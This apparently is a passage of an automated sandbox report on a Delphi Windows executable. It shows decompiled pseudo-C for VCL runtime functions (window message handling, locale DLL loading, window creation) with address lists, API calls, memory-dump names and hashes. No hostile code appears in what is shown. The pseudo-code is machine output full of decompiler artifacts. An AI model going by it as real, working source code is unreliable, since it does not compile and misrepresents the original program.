							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E00454F78(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BAFC("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x487c00; // 0x22e0f1c
							E00453DBC(_t267);
							E00454818(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x486d80; // 0x487b64
							E00440560( *_t271, _t312,  *(_v12 + 4));
							E004547AC(_v8, _t303, _t312, _v12, _t365);
							E00454818(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E00454818(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E004546A8();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E004546B8(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M00454944))) {
						case 0:
							__eax = E0041B790();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407040();
							__eax = E00454818(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E00454818(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044C690( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L004546B0();
							} else {
								_v8 = E004546B8(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E00454818(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00406FA0();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E00454818(__ebp);
							} else {
								__eax = E00454854(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00452024(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E00454818(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E00413FA4( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}





















































                                                                                0x004548a0
                                                                                0x004548a7
                                                                                0x004548a9
                                                                                0x004548ac
                                                                                0x004548b1
                                                                                0x004548b2
                                                                                0x004548b7
                                                                                0x004548ba
                                                                                0x004548c2
                                                                                0x004548d1
                                                                                0x004548d4
                                                                                0x00454908
                                                                                0x0045490e
                                                                                0x00454916
                                                                                0x00454918
                                                                                0x0045491a
                                                                                0x0045491d
                                                                                0x004549d1
                                                                                0x004549d6
                                                                                0x00454a1c
                                                                                0x00454a21
                                                                                0x00454a42
                                                                                0x00454a42
                                                                                0x00454a47
                                                                                0x00454eb4
                                                                                0x00454eb7
                                                                                0x00454ebb
                                                                                0x00454ed7
                                                                                0x00454ebd
                                                                                0x00454ec9
                                                                                0x00454ec9
                                                                                0x00454f26
                                                                                0x00454f26
                                                                                0x00454f28
                                                                                0x00454f2b
                                                                                0x00000000
                                                                                0x00454f2b
                                                                                0x00454a50
                                                                                0x00454a53
                                                                                0x00454d12
                                                                                0x00454a59
                                                                                0x00454f1f
                                                                                0x00454f20
                                                                                0x00454f25
                                                                                0x00000000
                                                                                0x00454a53
                                                                                0x00454a23
                                                                                0x00454e7e
                                                                                0x00454e81
                                                                                0x00454e85
                                                                                0x00454ead
                                                                                0x00454e87
                                                                                0x00454e95
                                                                                0x00454e95
                                                                                0x00000000
                                                                                0x00454e85
                                                                                0x00454a29
                                                                                0x00454a29
                                                                                0x00454a2e
                                                                                0x00454e2c
                                                                                0x00454e31
                                                                                0x00454e33
                                                                                0x00454e39
                                                                                0x00454e3e
                                                                                0x00454e41
                                                                                0x00454e44
                                                                                0x00454e4c
                                                                                0x00454e51
                                                                                0x00454e53
                                                                                0x00454e5a
                                                                                0x00454e5a
                                                                                0x00454e53
                                                                                0x00454e44
                                                                                0x00000000
                                                                                0x00454e33
                                                                                0x00454a34
                                                                                0x00454a37
                                                                                0x00454e64
                                                                                0x00454e74
                                                                                0x00000000
                                                                                0x00454a3d
                                                                                0x00000000
                                                                                0x00454a3d
                                                                                0x00454a37
                                                                                0x004549d8
                                                                                0x00454d3f
                                                                                0x00454d42
                                                                                0x00454d44
                                                                                0x00454d4a
                                                                                0x00454d4e
                                                                                0x00454d53
                                                                                0x00454d55
                                                                                0x00454d63
                                                                                0x00454d68
                                                                                0x00454d6a
                                                                                0x00454d78
                                                                                0x00454d7d
                                                                                0x00454d7f
                                                                                0x00454d85
                                                                                0x00454d8c
                                                                                0x00454d9b
                                                                                0x00454db4
                                                                                0x00454dba
                                                                                0x00454dbf
                                                                                0x00454dc9
                                                                                0x00454dc9
                                                                                0x00454d7f
                                                                                0x00454d6a
                                                                                0x00454d55
                                                                                0x00000000
                                                                                0x00454d44
                                                                                0x004549de
                                                                                0x004549e3
                                                                                0x00454a03
                                                                                0x00454a03
                                                                                0x00454a08
                                                                                0x00454dfd
                                                                                0x00454e00
                                                                                0x00454e08
                                                                                0x00454e1a
                                                                                0x00454e1a
                                                                                0x00000000
                                                                                0x00454e08
                                                                                0x00454a0e
                                                                                0x00454a11
                                                                                0x00454d20
                                                                                0x00454d25
                                                                                0x00454d27
                                                                                0x00454d30
                                                                                0x00454d30
                                                                                0x00000000
                                                                                0x00454a17
                                                                                0x00000000
                                                                                0x00454a17
                                                                                0x00454a11
                                                                                0x004549e5
                                                                                0x00454dd5
                                                                                0x00454dd8
                                                                                0x00454de0
                                                                                0x00454df2
                                                                                0x00454df2
                                                                                0x00000000
                                                                                0x00454de0
                                                                                0x004549eb
                                                                                0x004549eb
                                                                                0x004549f0
                                                                                0x00454a69
                                                                                0x00454a69
                                                                                0x00454a6e
                                                                                0x00454a7c
                                                                                0x00454a70
                                                                                0x00454a70
                                                                                0x00454a75
                                                                                0x00454a89
                                                                                0x00454a77
                                                                                0x00454a94
                                                                                0x00454a99
                                                                                0x00454a75
                                                                                0x00000000
                                                                                0x00454a6e
                                                                                0x004549f5
                                                                                0x004549f8
                                                                                0x00454c21
                                                                                0x00000000
                                                                                0x004549fe
                                                                                0x00000000
                                                                                0x004549fe
                                                                                0x004549f8
                                                                                0x00454923
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454929
                                                                                0x0045492c
                                                                                0x00454998
                                                                                0x0045499b
                                                                                0x004549ba
                                                                                0x004549ba
                                                                                0x004549bd
                                                                                0x00454aff
                                                                                0x00000000
                                                                                0x00454aff
                                                                                0x004549c3
                                                                                0x004549c6
                                                                                0x00454c45
                                                                                0x00454c4b
                                                                                0x00454c51
                                                                                0x00454c57
                                                                                0x00454c5a
                                                                                0x00454c61
                                                                                0x00454c67
                                                                                0x00454c6a
                                                                                0x00454c71
                                                                                0x00454cf1
                                                                                0x00454c73
                                                                                0x00454c82
                                                                                0x00454c87
                                                                                0x00454c8d
                                                                                0x00454c8f
                                                                                0x00454cd9
                                                                                0x00454ce1
                                                                                0x00454c91
                                                                                0x00454c96
                                                                                0x00454cad
                                                                                0x00454caf
                                                                                0x00454cb1
                                                                                0x00454cb3
                                                                                0x00454cbc
                                                                                0x00454cca
                                                                                0x00454cca
                                                                                0x00454cb3
                                                                                0x00454c8f
                                                                                0x00454c71
                                                                                0x00454c61
                                                                                0x00000000
                                                                                0x004549cc
                                                                                0x00000000
                                                                                0x004549cc
                                                                                0x004549c6
                                                                                0x0045499d
                                                                                0x00454f05
                                                                                0x00454f0a
                                                                                0x00454f10
                                                                                0x00000000
                                                                                0x00454f15
                                                                                0x004549a3
                                                                                0x004549a3
                                                                                0x004549a6
                                                                                0x00454ee5
                                                                                0x00454eec
                                                                                0x00454ef7
                                                                                0x00454efd
                                                                                0x00000000
                                                                                0x00454f02
                                                                                0x004549ac
                                                                                0x004549af
                                                                                0x00454b29
                                                                                0x00454b2f
                                                                                0x00454b32
                                                                                0x00454b36
                                                                                0x00454b3c
                                                                                0x00454b42
                                                                                0x00454b45
                                                                                0x00454b49
                                                                                0x00454b70
                                                                                0x00454b85
                                                                                0x00454b4b
                                                                                0x00454b4e
                                                                                0x00454b63
                                                                                0x00454b63
                                                                                0x00000000
                                                                                0x004549b5
                                                                                0x00000000
                                                                                0x004549b5
                                                                                0x004549af
                                                                                0x0045492e
                                                                                0x00454c29
                                                                                0x00454c2c
                                                                                0x00454c30
                                                                                0x00454c39
                                                                                0x00454c39
                                                                                0x00000000
                                                                                0x00454c30
                                                                                0x00454934
                                                                                0x00454937
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045493d
                                                                                0x00000000
                                                                                0x00454f18
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454b07
                                                                                0x00454b09
                                                                                0x00454b0b
                                                                                0x00454b13
                                                                                0x00454b16
                                                                                0x00454b17
                                                                                0x00454b1d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454b8f
                                                                                0x00454b92
                                                                                0x00454b96
                                                                                0x00454bca
                                                                                0x00454bd0
                                                                                0x00454bd3
                                                                                0x00454bda
                                                                                0x00454bdc
                                                                                0x00454bdf
                                                                                0x00454be2
                                                                                0x00454be7
                                                                                0x00454bea
                                                                                0x00454bea
                                                                                0x00454bf3
                                                                                0x00454b98
                                                                                0x00454b9b
                                                                                0x00454ba0
                                                                                0x00454ba3
                                                                                0x00454ba9
                                                                                0x00454bab
                                                                                0x00454bb2
                                                                                0x00454bb5
                                                                                0x00454bb5
                                                                                0x00454bb7
                                                                                0x00454bb7
                                                                                0x00454bbe
                                                                                0x00454bc3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454ab7
                                                                                0x00454aba
                                                                                0x00454abd
                                                                                0x00454abe
                                                                                0x00454ac3
                                                                                0x00454ac5
                                                                                0x00454ad4
                                                                                0x00454ac7
                                                                                0x00454ac8
                                                                                0x00454acd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454a9f
                                                                                0x00454aa2
                                                                                0x00454aa5
                                                                                0x00454aa7
                                                                                0x00454aad
                                                                                0x00454aad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454adf
                                                                                0x00454ae2
                                                                                0x00454ae9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004548d6
                                                                                0x004548d6
                                                                                0x004548d7
                                                                                0x00000000
                                                                                0x004548d9
                                                                                0x004548f5
                                                                                0x00000000
                                                                                0x004548f7
                                                                                0x004548f7
                                                                                0x004548f9
                                                                                0x004548fc
                                                                                0x004548fc
                                                                                0x00454f45
                                                                                0x00454f4b
                                                                                0x00454904
                                                                                0x00454904
                                                                                0x00454905
                                                                                0x00454905
                                                                                0x00454906
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454906

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RegisterAutomation$d{H$vcltest3.dll
                                                                                • API String ID: 0-2387504366
                                                                                • Opcode ID: e26ccd446a316f4fbb8a516c3d14ae18cd1f500151cd010e907ea5265a56c9f3
                                                                                • Instruction ID: 8ad9d7c783a2c6ce4ebe263d3ed71b4ee7457bda608aaccbfb27e864ecc426a2
                                                                                • Opcode Fuzzy Hash: e26ccd446a316f4fbb8a516c3d14ae18cd1f500151cd010e907ea5265a56c9f3
                                                                                • Instruction Fuzzy Hash: B5E18F35A04205EFD700DB5DC985A5EB7B0AB8831AF2580A6EC049F753D738EEC9DB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405D84, Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E00405D84() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401310();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401318();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401310();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401310();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401310();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                                0x00405d84
                                                                                0x00405d8c
                                                                                0x00405d93
                                                                                0x00405d94
                                                                                0x00405da7
                                                                                0x00405dac
                                                                                0x00405db5
                                                                                0x00405e9e
                                                                                0x00405ea5
                                                                                0x00405dcb
                                                                                0x00405dcb
                                                                                0x00405dd1
                                                                                0x00405dd2
                                                                                0x00405ddf
                                                                                0x00405de4
                                                                                0x00405de7
                                                                                0x00405de3
                                                                                0x00000000
                                                                                0x00405de3
                                                                                0x00405df3
                                                                                0x00405dfb
                                                                                0x00405e01
                                                                                0x00405e06
                                                                                0x00405e13
                                                                                0x00405e17
                                                                                0x00405e18
                                                                                0x00405e19
                                                                                0x00405e2e
                                                                                0x00405e2e
                                                                                0x00405e32
                                                                                0x00405e4b
                                                                                0x00405e4f
                                                                                0x00405e50
                                                                                0x00405e51
                                                                                0x00405e61
                                                                                0x00405e66
                                                                                0x00405e6a
                                                                                0x00405e6c
                                                                                0x00405e81
                                                                                0x00405e85
                                                                                0x00405e86
                                                                                0x00405e87
                                                                                0x00405e97
                                                                                0x00405e9c
                                                                                0x00405e9c
                                                                                0x00405e6a
                                                                                0x00405e32
                                                                                0x00000000
                                                                                0x00405dfb

                                                                                APIs
                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
                                                                                • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
                                                                                • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                • API String ID: 1599918012-2375825460
                                                                                • Opcode ID: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
                                                                                • Instruction ID: 1996122f5b3b820df51850e3b8abf2c553d6293b2967b506f70bd3d03d36238e
                                                                                • Opcode Fuzzy Hash: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
                                                                                • Instruction Fuzzy Hash: 82315071E0061C2AFB25D6B8DC8ABEF66AC8B04384F4441F7B644F61C1DA789F848F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00454818, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00454818(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406CF8(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                                                0x00454824
                                                                                0x0045482e
                                                                                0x00454837
                                                                                0x0045483e
                                                                                0x00454841
                                                                                0x00454842
                                                                                0x0045484d
                                                                                0x00454851

                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00454842
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 5ea0eff2d8d2a340c07e9b1a96fb3f22a4118a99491f868511381c8acdcdbb2f
                                                                                • Instruction ID: 8e3812bb2dbae8fdc8bd2ff27f39f94ffe5d655063029f50f454f61ff6dda21e
                                                                                • Opcode Fuzzy Hash: 5ea0eff2d8d2a340c07e9b1a96fb3f22a4118a99491f868511381c8acdcdbb2f
                                                                                • Instruction Fuzzy Hash: BDF0C579205608AFDB40DF9DC588D4AFBE8FB4C260B458195BD88CB321C234FE808F90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00454384, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130windowregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 42%
                                                                                			E00454384(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x45451b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x454522);
					return E00404320( &_v48);
				}
				_t22 =  *0x486cc4; // 0x487048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041C940(E004548A0, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x46bc2c; // 0x45406c
				_t26 =  *0x487714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x487714; // 0x400000
					 *0x46bc18 = _t61;
					_t87 = RegisterClassA(0x46bc08);
					if(_t87 == 0) {
						_t63 =  *0x486a78; // 0x41cc54
						E00406520(_t63,  &_v48);
						E0040A0B0(_v48, 1);
						E00403D80();
					}
				}
				_t28 =  *0x486b30; // 0x487a94
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x486b30; // 0x487a94
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x487714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x27800044
				_t38 = E004047D0( *_t7);
				_t39 =  *0x46bc2c; // 0x45406c, executed
				_t40 = E00407288(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44c59c
				E00404320(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10940000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x486b9c; // 0x487b68
				if( *_t46 != 0) {
					_t54 = E00454F78(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E00454F78(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x486b9c; // 0x487b68
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}




























                                                                                0x0045438d
                                                                                0x00454390
                                                                                0x00454394
                                                                                0x00454395
                                                                                0x0045439a
                                                                                0x0045439d
                                                                                0x004543a7
                                                                                0x00454505
                                                                                0x00454507
                                                                                0x0045450a
                                                                                0x0045450d
                                                                                0x0045451a
                                                                                0x0045451a
                                                                                0x004543ad
                                                                                0x004543b5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004543c1
                                                                                0x004543c6
                                                                                0x004543cd
                                                                                0x004543d3
                                                                                0x004543e0
                                                                                0x004543e2
                                                                                0x004543e7
                                                                                0x004543f6
                                                                                0x004543f9
                                                                                0x004543fe
                                                                                0x00454403
                                                                                0x00454412
                                                                                0x00454417
                                                                                0x00454417
                                                                                0x004543f9
                                                                                0x0045441e
                                                                                0x00454427
                                                                                0x00454429
                                                                                0x0045442b
                                                                                0x0045442b
                                                                                0x00454431
                                                                                0x0045443a
                                                                                0x0045443c
                                                                                0x0045443e
                                                                                0x0045443e
                                                                                0x00454441
                                                                                0x00454442
                                                                                0x00454444
                                                                                0x00454446
                                                                                0x00454448
                                                                                0x0045444a
                                                                                0x0045444f
                                                                                0x00454450
                                                                                0x00454452
                                                                                0x00454458
                                                                                0x00454464
                                                                                0x00454469
                                                                                0x0045446e
                                                                                0x00454471
                                                                                0x00454477
                                                                                0x0045447c
                                                                                0x00454483
                                                                                0x00454489
                                                                                0x0045448d
                                                                                0x00454492
                                                                                0x0045449a
                                                                                0x0045449e
                                                                                0x004544ab
                                                                                0x004544af
                                                                                0x004544b6
                                                                                0x004544be
                                                                                0x004544c2
                                                                                0x004544c2
                                                                                0x004544c9
                                                                                0x004544d2
                                                                                0x004544dc
                                                                                0x004544e9
                                                                                0x004544ee
                                                                                0x004544f6
                                                                                0x00454500
                                                                                0x00454500
                                                                                0x00000000

                                                                                APIs
